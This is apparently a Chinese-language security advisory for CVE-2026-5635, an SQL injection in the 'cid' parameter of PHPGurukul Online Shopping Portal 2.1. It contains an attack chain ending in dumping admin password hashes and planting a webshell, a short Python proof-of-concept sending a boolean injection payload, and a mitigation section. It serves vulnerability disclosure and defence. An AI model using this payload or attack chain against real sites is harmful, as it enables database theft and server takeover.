CVE-2026-5635 CVSS 6.3 中危

CVE-2026-5635 PHPGurukul在线购物商城SQL注入漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5635

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Online Shopping Portal Project

漏洞概述

PHPGurukul Online Shopping Portal Project 2.1版本被发现存在安全漏洞。该漏洞影响`/categorywise-products.php`文件的参数处理组件。由于未对`cid`参数进行充分过滤，导致攻击者可远程发起SQL注入攻击。目前利用代码已公开，建议及时修补。

技术细节

该漏洞位于PHPGurukul Online Shopping Portal Project 2.1版本的`/categorywise-products.php`文件中。漏洞根源在于应用程序在处理用户请求时，未对`cid`参数进行充分的安全过滤，直接将其拼接到SQL查询语句中。攻击者可以利用这一缺陷，通过网络发送精心构造的恶意请求，在`cid`参数中注入SQL控制字符（如单引号、注释符）及特定语法（如UNION查询）。由于CVSS显示权限要求为低（PR:L），攻击者无需管理员权限即可发起攻击。一旦利用成功，攻击者能够绕过正常的数据库查询逻辑，读取敏感信息（如用户密码哈希）、修改数据库内容或执行其他数据库管理操作，从而对系统的机密性、完整性和可用性造成威胁。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是PHPGurukul Online Shopping Portal Project 2.1版本，并确认存在/categorywise-products.php接口。

STEP 2

漏洞探测

攻击者向/categorywise-products.php发送带有特殊构造的cid参数（如单引号或AND 1=1）的HTTP GET请求，观察服务器响应是否存在数据库报错或逻辑差异。

STEP 3

注入攻击

确认存在注入后，攻击者利用UNION SELECT等SQL语句提取数据库结构信息，进而获取管理员表名、用户名及密码哈希等敏感数据。

STEP 4

利用与控制

利用获取的凭证登录后台，或进一步写入WebShell，从而完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    # Target endpoint
    target = f"{url}/categorywise-products.php"
    # Malicious payload for 'cid' parameter to test SQL Injection
    # Using a simple single quote to break the query syntax
    payload = "1' AND 1=1-- -"
    
    params = {
        "cid": payload
    }
    
    try:
        response = requests.get(target, params=params, timeout=10)
        if response.status_code == 200:
            print(f"Request sent to: {response.url}")
            print(f"Response Status: {response.status_code}")
            print("Check response content manually for database errors or data changes.")
            print(response.text[:500]) # Print first 500 chars for analysis
        else:
            print(f"Unexpected status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target_domain = "http://example.com"
    check_sqli(target_domain)

影响范围

PHPGurukul Online Shopping Portal Project 2.1

防御指南

临时缓解措施

如果无法立即升级，建议在服务器端部署WAF规则以拦截针对`cid`参数的恶意SQL注入尝试，或者通过代码层面对`cid`参数强制进行`intval()`转换，确保其为纯数字格式，从而阻断注入攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5635
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5635
3 Details https://www.cvedetails.com/cve/CVE-2026-5635/
4 VulDB https://vuldb.com/cve/CVE-2026-5635
5 Link https://github.com/f1rstb100d/CVE/issues/15
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/785872
8 Link https://vuldb.com/vuln/355423
9 Link https://vuldb.com/vuln/355423/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表